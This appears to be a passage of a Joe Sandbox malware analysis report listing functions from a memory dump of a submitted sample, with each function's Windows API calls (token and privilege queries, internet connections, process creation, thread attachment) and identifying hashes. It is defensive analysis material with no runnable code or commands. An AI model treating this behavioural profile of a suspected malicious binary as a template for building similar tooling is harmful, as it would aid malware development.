Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 11a276e63d2174164ff4938dd31e5efeb53df52cf6cdb16800f6d978f9dbfeb4
Instruction ID: 3afa6fe5de7e42b7b6e7c24bd0a94ea6f08a5c48459dcdd97a7397501c74f7d3
Opcode Fuzzy Hash: 11a276e63d2174164ff4938dd31e5efeb53df52cf6cdb16800f6d978f9dbfeb4
Instruction Fuzzy Hash: EC113DB2A04218BEDB04B3B5BC87AFEBBE99F85320F14611AF208771D2DE315D459391

Function 00E78B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E78669
Part of subcall function 00E78652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E78673
Part of subcall function 00E78652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78682
Part of subcall function 00E78652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78689
Part of subcall function 00E78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E7869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E78BEB
_memcmp.LIBCMT ref: 00E78C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E78C44
HeapFree.KERNEL32(00000000), ref: 00E78C4B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: de4150288e263d56adeccb6c6b5a1302fe2131b932ca30bb2bf151464c532599
Instruction ID: 20aa1b1da8f5b8f9a20507f5f2298b0e38601628b2b9999d912ed243c4580b14
Opcode Fuzzy Hash: de4150288e263d56adeccb6c6b5a1302fe2131b932ca30bb2bf151464c532599
Instruction Fuzzy Hash: EA219F71E41208EFCB10CF94CA49BEEF7B8EF64354F158059E458B7240DB30AA05DB61

Function 00E91A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E91A97

Part of subcall function 00E91B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E91B40
Part of subcall function 00E91B21: InternetCloseHandle.WININET(00000000), ref: 00E91BDD

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: e2f8a3b01df852d38c48f374f24256c9ba70b8859268da2c9ee545cbbae5dc54
Instruction ID: 00dbd7fd38c6c88da2b74cbb1d73f6994ae69fedb7d08549faec463fcb87ed28
Opcode Fuzzy Hash: e2f8a3b01df852d38c48f374f24256c9ba70b8859268da2c9ee545cbbae5dc54
Instruction Fuzzy Hash: A3218075200602BFDF119FA08C01FBAB7AEFF49701F10501AFA11A6550E771A8159790

Function 00E7E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E7E1C4,?,?,?,00E7EFB7,00000000,000000EF,00000119,?,?), ref: 00E7F5BC
Part of subcall function 00E7F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E7F5E2
Part of subcall function 00E7F5AD: lstrcmpiW.KERNEL32(00000000,?,00E7E1C4,?,?,?,00E7EFB7,00000000,000000EF,00000119,?,?), ref: 00E7F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E7E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00E7E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E7E237

Strings

cdecl, xrefs: 00E7E22E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6a9e6bac28e4377f87a5756cdb82cbb3015ba05649ac5ca33a667736068ce3fa
Instruction ID: 1560268ca4e30e0b4e0921737961d33626839a6eadc331da27197401eb64c235
Opcode Fuzzy Hash: 6a9e6bac28e4377f87a5756cdb82cbb3015ba05649ac5ca33a667736068ce3fa
Instruction Fuzzy Hash: 9F11D03A200341EFCB25AF74DC45D7A77A8FF89350B40906AF80ADB261EB71AC51D7A0

Function 00E55332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E55351

Part of subcall function 00E4594C: __FF_MSGBANNER.LIBCMT ref: 00E45963
Part of subcall function 00E4594C: __NMSG_WRITE.LIBCMT ref: 00E4596A
Part of subcall function 00E4594C: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,?,?,?,00E41013,?), ref: 00E4598F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: bc3adb9e69a0b943a497f56a886a80781d6cb94be5bf65fa3d9381289942f383
Instruction ID: 2c8ab9a33b74abebcc1b374436c7c3b120a711f48fe707f4a1f1c7f7c5b8cfd0
Opcode Fuzzy Hash: bc3adb9e69a0b943a497f56a886a80781d6cb94be5bf65fa3d9381289942f383
Instruction Fuzzy Hash: 3A110133905A05AFCF212F70FC6566D3BD89F053E2F10282AFD48BA091DA7189489690

Function 00E24531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E24560

Part of subcall function 00E2410D: _memset.LIBCMT ref: 00E2418D
Part of subcall function 00E2410D: _wcscpy.LIBCMT ref: 00E241E1
Part of subcall function 00E2410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E241F1

KillTimer.USER32(?,00000001,?,?), ref: 00E245B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E245C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E5D6CE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 19cfdb4d0df02b0be4bd38602dbf3dbdf6e2b9087a54474d5af25757aeeca4d2
Instruction ID: 587974d6c56ae10063434f2b5f18c132b25db3ed2ea0e71a2c762b1927b54ab5
Opcode Fuzzy Hash: 19cfdb4d0df02b0be4bd38602dbf3dbdf6e2b9087a54474d5af25757aeeca4d2
Instruction Fuzzy Hash: B8210AB05083949FEB328B24DC45BE7BBEC9F05309F00149EE6DE76191C7B45A898B51

Function 00E9667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E87B20,?,?,00000000), ref: 00E25B8C
Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E87B20,?,?,00000000,?,?), ref: 00E25BB0

gethostbyname.WSOCK32(?,?,?), ref: 00E966AC
WSAGetLastError.WSOCK32(00000000), ref: 00E966B7
_memmove.LIBCMT ref: 00E966E4
inet_ntoa.WSOCK32(?), ref: 00E966EF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: a754aa9d42736e3859be46d3bc51ef5f9becd09162a651f7fd0799b03ed4cf50
Instruction ID: eb0907862858567d387144a4992b4593a00e6998ed27f315caeed5c291799740
Opcode Fuzzy Hash: a754aa9d42736e3859be46d3bc51ef5f9becd09162a651f7fd0799b03ed4cf50
Instruction Fuzzy Hash: 6B115E76900508AFCF04EBA4EE86DEEB7F8AF49310B145066F506B7162DF30AE04CB61

Function 00E79023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E79043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E79055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E79086

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f340e0a4c2709d82bcb97152f832da78c2077d72ff9313e1e1626c53a950f9c2
Instruction ID: a7e905df138b8dbf3cca2f6f0aae8d326190b4b6544870607fac62b0054a9b83
Opcode Fuzzy Hash: f340e0a4c2709d82bcb97152f832da78c2077d72ff9313e1e1626c53a950f9c2
Instruction Fuzzy Hash: E2114879900218FFEB10DFA5C885EADBBB8FF48310F2040A5EA04B7290D6726E10DB90

Function 00E21290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

DefDlgProcW.USER32(?,00000020,?), ref: 00E212D8
GetClientRect.USER32(?,?), ref: 00E5B84B
GetCursorPos.USER32(?), ref: 00E5B855
ScreenToClient.USER32(?,?), ref: 00E5B860

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5eb4c539d5072755d48e6e96dcd8a8255913c8d5e0ee45806662dba5f480b180
Instruction ID: f0afb4a568ab6226fd347aa8d78472964d0859bbc2e50b75503871b5ea589cbb
Opcode Fuzzy Hash: 5eb4c539d5072755d48e6e96dcd8a8255913c8d5e0ee45806662dba5f480b180
Instruction Fuzzy Hash: 98113A36900029EFCB10DFA5E8859FE77B8EB1A301F101496F901F7261D730BA55ABA5

Function 00E81652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E801FD,?,00E81250,?,00008000), ref: 00E8166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E801FD,?,00E81250,?,00008000), ref: 00E81694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E801FD,?,00E81250,?,00008000), ref: 00E8169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00E801FD,?,00E81250,?,00008000), ref: 00E816D1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 9d0eb6a91ea116a85020d5e726e92bc7b3132a75536f683da9afea6f78c51b19
Instruction ID: 1dfe33d6bd156ce60aa447ce1b3e3b4b354206a786e10902e54ea0547891a2e1
Opcode Fuzzy Hash: 9d0eb6a91ea116a85020d5e726e92bc7b3132a75536f683da9afea6f78c51b19
Instruction Fuzzy Hash: A5118E31C0151CDBCF00AFE6E848AEEBB7CFF19751F054096E9C8B6240EB3165629B96

Function 00E57207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00E5722B

Part of subcall function 00E57912: __fltout2.LIBCMT ref: 00E5793B

__cftog_l.LIBCMT ref: 00E57251
__cftoe_l.LIBCMT ref: 00E57283

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 017a2453cbcfcc24944b531973d880baaf62571aaa98cc22983e5ef917dba6fa
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: EE01807A05414ABBCF125E84EC01CEE3F62BF59346F099915FE9868031D237C9B9AB81

Function 00EAB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EAB59E
ScreenToClient.USER32(?,?), ref: 00EAB5B6
ScreenToClient.USER32(?,?), ref: 00EAB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EAB5F5

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 0f1bffc21917e6b316a815fa0815a1e741557e54329e1580a15952d89471f5ca
Instruction ID: bb59e3231aeb2cf7e2877e3ded0dcc437f3573a5168ea53dbed3e506dfb29887
Opcode Fuzzy Hash: 0f1bffc21917e6b316a815fa0815a1e741557e54329e1580a15952d89471f5ca
Instruction Fuzzy Hash: 951132B9D00209EFDB41CFA9C8849EEBBF9FB49310F108166E915E2220D735AA558F91

Function 00EAB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EAB8FE
_memset.LIBCMT ref: 00EAB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EE7F20,00EE7F64), ref: 00EAB93C
CloseHandle.KERNEL32 ref: 00EAB94E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 69d06ee8585773e0d3305bd15ee05a4a127a2bd52ea65fdcf059443bcccfc043
Instruction ID: c3235c1788b1d978cbf061ee3be91397b29879b2f9af2718909c163ec88b6a23
Opcode Fuzzy Hash: 69d06ee8585773e0d3305bd15ee05a4a127a2bd52ea65fdcf059443bcccfc043
Instruction Fuzzy Hash: 2EF054B16443887FE71027B2BC46F7B3A9CEB09354F001020FA48F9292D7715D08C7A8

Function 00E86E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00E86E88

Part of subcall function 00E8794E: _memset.LIBCMT ref: 00E87983

_memmove.LIBCMT ref: 00E86EAB
_memset.LIBCMT ref: 00E86EB8
LeaveCriticalSection.KERNEL32(?), ref: 00E86EC8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 09c0d05e5d7b6aa23c05c906e3e6a015cafe80cd357874374c4edf83ab1cd02d
Instruction ID: fb60639f8f8c0f37a37c202bf7a55e6341f35872d208870e53a2e95aa3853fbe
Opcode Fuzzy Hash: 09c0d05e5d7b6aa23c05c906e3e6a015cafe80cd357874374c4edf83ab1cd02d
Instruction Fuzzy Hash: D6F0543A100200ABCF516F55EC85B49BB69EF49320B0480A1FE0C6E226C731E951CBB4

Function 00EAC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E2134D
Part of subcall function 00E212F3: SelectObject.GDI32(?,00000000), ref: 00E2135C
Part of subcall function 00E212F3: BeginPath.GDI32(?), ref: 00E21373
Part of subcall function 00E212F3: SelectObject.GDI32(?,00000000), ref: 00E2139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAC030
LineTo.GDI32(00000000,?,?), ref: 00EAC03D
EndPath.GDI32(00000000), ref: 00EAC04D
StrokePath.GDI32(00000000), ref: 00EAC05B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: dedb8532708927eafbfbd5f7c709dc87879b0567ea965b87ad7a1ff3e85a617e
Instruction ID: f301423699ffd2381dda149cb993ce3c59ab3a49aac6db43947e535fd62b1848
Opcode Fuzzy Hash: dedb8532708927eafbfbd5f7c709dc87879b0567ea965b87ad7a1ff3e85a617e
Instruction Fuzzy Hash: A9F05E32001259FFDB226F96BC49FCE3F99AF1B311F144040FA11750E287B56659DB99

Function 00E7A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7A3AC
GetCurrentThreadId.KERNEL32 ref: 00E7A3B3
AttachThreadInput.USER32(00000000), ref: 00E7A3BA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: efede0b8276b9506e61bf31c9bb4e10b9efe945877f8f0b77783fdbb153a22f4
Instruction ID: e6c12338f9998ed83a36358c9dbefb5d948e81b4cfe910714c8b4db1b104a436
Opcode Fuzzy Hash: efede0b8276b9506e61bf31c9bb4e10b9efe945877f8f0b77783fdbb153a22f4
Instruction Fuzzy Hash: 21E03971541228BADB205FA2DC0CEDB3F1CEF6A7A2F048034F509A40A0C671D544CBE0

Function 00E22218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E22231
SetTextColor.GDI32(?,000000FF), ref: 00E2223B
SetBkMode.GDI32(?,00000001), ref: 00E22250
GetStockObject.GDI32(00000005), ref: 00E22258
GetWindowDC.USER32(?,00000000), ref: 00E5C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E5C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00E5C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00E5C112
GetPixel.GDI32(00000000,?,?), ref: 00E5C132
ReleaseDC.USER32(?,00000000), ref: 00E5C13D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
